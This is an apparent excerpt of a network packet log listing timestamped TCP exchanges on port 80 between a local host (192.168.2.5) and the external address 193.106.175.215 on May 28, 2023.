May 28, 2023 09:29:41.868356943 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.868376970 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.868386030 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.868400097 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.868408918 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.868421078 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.868443012 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.868446112 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.868463993 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.868479967 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.868484974 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.868506908 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.868505955 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.868529081 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.868541002 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.868551016 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.868562937 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.868571997 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.868585110 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.868593931 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.868608952 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.868614912 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.868637085 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.868642092 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.868659019 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.868680000 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.868680954 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.868700981 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.868716955 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.868722916 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.868738890 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.868745089 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.868767023 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.868776083 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.868788958 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.868801117 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.868812084 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.868829012 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.868834019 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.868854046 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.868868113 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.868872881 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.868892908 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.868900061 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.868913889 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.868932962 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.868937016 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.868953943 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.868962049 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.868974924 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.868993998 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.868999004 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.869013071 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.869033098 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.869035006 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.869054079 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.869057894 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.869074106 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.869092941 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.869096041 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.869112968 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.869132042 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.869132996 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.869151115 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.869158983 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.869170904 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.869191885 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.869199038 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.869211912 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.869232893 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.869234085 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.869252920 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.869257927 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.869273901 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.869292974 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.869294882 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.869313002 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.869328022 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.869334936 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.869354963 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.869359970 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.869375944 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.869395018 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.869395971 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.869415045 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.869419098 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.869435072 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.869453907 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.869453907 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.869481087 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.869486094 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.869501114 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.869519949 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.869539976 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.869546890 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.869560957 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.869581938 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.869581938 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.869601965 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.869606018 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.869622946 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.869641066 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.869646072 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.869667053 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.869669914 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.869687080 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.869708061 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.869712114 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.869729042 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.869735003 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.869750977 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.869770050 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.869772911 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.869791985 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.869812012 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.869812965 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.869833946 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.869841099 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.869857073 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.869878054 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.869879007 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.869899035 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.869913101 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.869920015 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.869940996 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.869956970 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.869960070 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.869982004 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.869990110 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.870002985 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.870012999 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.870023966 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.870043039 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.870048046 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.870063066 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.870083094 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.870090961 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.870105028 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.870107889 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.870126963 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.870142937 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.870146990 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.870166063 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.870168924 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.870191097 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.870194912 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.870212078 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.870232105 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.870238066 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.870251894 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.870260954 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.870273113 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.870292902 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.870296955 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.870313883 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.870335102 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.870337963 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.870357037 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.870359898 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.870378017 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.870398998 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.870402098 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.870419025 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.870440006 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.870440960 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.870461941 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.870465994 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.870482922 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.870502949 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.870505095 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.870524883 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.870542049 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.870547056 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.870568037 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.870568037 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.870588064 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.870604038 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.870606899 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.870628119 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.870635986 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.870650053 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.870668888 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.870668888 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.870691061 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.870692968 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.870712042 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.870729923 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.870733023 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.870754004 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.870763063 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.870774984 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.870795965 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.870800018 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.870817900 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.870837927 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.870842934 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.870860100 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.870872021 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.870881081 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.870901108 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.870912075 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.870920897 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.870940924 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.870950937 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.870959997 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.870974064 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.870980978 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.871001005 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.871015072 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.871022940 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.871043921 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.871046066 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.871064901 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.871069908 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.871085882 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.871107101 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.871119022 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.871126890 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.871148109 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.871148109 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.871169090 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.871169090 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.871191025 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.871211052 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.871212006 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.871231079 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.871243954 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.871251106 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.871272087 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.871275902 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.871292114 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.871313095 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.871314049 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.871335030 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.871336937 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.871356964 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.871371984 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.871377945 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.871397972 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.871398926 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.871419907 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.871433973 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.871439934 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.871459961 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.871467113 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.871481895 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.871501923 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.871504068 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.871522903 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.871530056 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.871545076 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.871563911 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.871566057 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.871584892 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.871597052 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.871604919 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.871624947 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.871629953 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.871648073 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.871668100 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.871674061 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.871689081 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.871699095 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.871711016 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.871731043 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.871735096 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.871751070 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.871771097 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.871778011 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.871792078 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.871802092 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.871814013 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.871834040 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.871841908 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.871855021 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.871875048 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.871881008 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.871896029 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.871901989 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.871917009 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.871936083 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.871939898 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.871957064 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.871977091 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.871978045 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.871998072 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.871999979 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.872019053 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.872039080 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.872040987 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.872060061 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.872080088 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.872080088 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.872101068 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.872113943 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.872122049 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.872140884 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.872152090 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.872160912 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.872174978 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.872183084 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.872203112 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.872215986 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.872226000 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.872246981 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.872256041 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.872283936 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.872309923 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.872318029 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.872339964 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.872360945 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.872361898 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.872381926 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.872386932 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.872404099 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.872416019 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.872423887 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.872438908 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.872447014 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.872467995 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.872472048 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.872488976 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.872509003 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.872513056 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.872528076 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.872540951 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.872582912 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.935667992 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.935807943 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.935831070 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.935851097 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.935866117 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.935870886 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.935893059 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.935902119 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.935914993 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.935934067 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.935935974 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.935955048 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.935957909 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.935975075 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.935992956 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.935996056 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.936017036 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.936026096 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.936038017 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.936058044 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.936058044 CEST	80	49715	193.106.175.215	192.168.2.5
